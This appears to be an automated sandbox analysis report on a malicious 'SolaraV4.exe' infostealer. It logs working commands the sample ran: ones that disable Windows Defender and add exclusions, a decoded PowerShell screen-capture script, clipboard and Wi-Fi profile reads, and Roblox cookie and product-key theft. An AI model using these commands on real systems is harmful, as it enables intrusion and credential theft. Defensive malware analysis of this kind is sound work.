Source: SolaraV4.exe, 00000003.00000003.2496514190.0000024132E88000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2668174875.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2974439569.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2658597789.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2967612000.0000024132E7E000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2679350163.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2677235249.0000024132E7F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2660879553.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2637075073.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2821702107.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2614558332.0000024132E7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW}
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareservice
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareservicer6
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareuser
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
Source: getmac.exe, 00000050.00000003.2657356233.000001E2C989E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxserviceZ
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareservicer6Z
Source: SolaraV4.exe, 00000003.00000003.2649768590.00000241333A4000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2661241266.0000024133495000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2659321131.0000024133495000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2676202946.0000024133496000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2677512782.00000241333A0000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2652473109.0000024133495000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2669072153.00000241333A0000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2680559821.0000024133496000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2975881407.0000024133496000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2667572922.0000024133496000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2820630288.0000024133496000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696508427o
Source: getmac.exe, 00000050.00000002.2658681737.000001E2C98B3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657356233.000001E2C989E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWRoot%\system32\d'|Y
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray
Source: getmac.exe, 00000050.00000002.2658681737.000001E2C98D2000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657313901.000001E2C98CF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareuserZ
Source: getmac.exe, 00000050.00000003.2657356233.000001E2C989E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-VY
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: qemu-gaZ
Source: getmac.exe, 00000050.00000002.2658681737.000001E2C98D2000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657313901.000001E2C98CF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmtoolsd
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwarec
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwaretrayZ
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696508427
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00007FF6FFC5D12C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E502A0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 3_2_00007FFE75E502A0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC73480 GetProcessHeap, 1_2_00007FF6FFC73480
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00007FF6FFC5D12C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00007FF6FFC5C8A0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC6A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00007FF6FFC6A614
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5D30C SetUnhandledExceptionFilter, 1_2_00007FF6FFC5D30C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC5D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00007FF6FFC5D12C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC5C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00007FF6FFC5C8A0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC6A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00007FF6FFC6A614
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC5D30C SetUnhandledExceptionFilter, 3_2_00007FF6FFC5D30C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C83068 IsProcessorFeaturePresent,00007FFE957D19A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE957D19A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00007FFE75C83068
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75DA2004 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00007FFE75DA2004
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C723A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 108_2_00007FF7C723A66C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C723B6D8 SetUnhandledExceptionFilter, 108_2_00007FF7C723B6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C723B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 108_2_00007FF7C723B52C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7244C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 108_2_00007FF7C7244C10

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\SolaraV4.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Users\user\Desktop\SolaraV4.exe "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()""
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand …
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand …
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.cmdline"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6CAA.tmp" "c:\Users\user\AppData\Local\Temp\myx0gned\CSC193A8B703A1D4F08B0E861F82E42C2AF.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
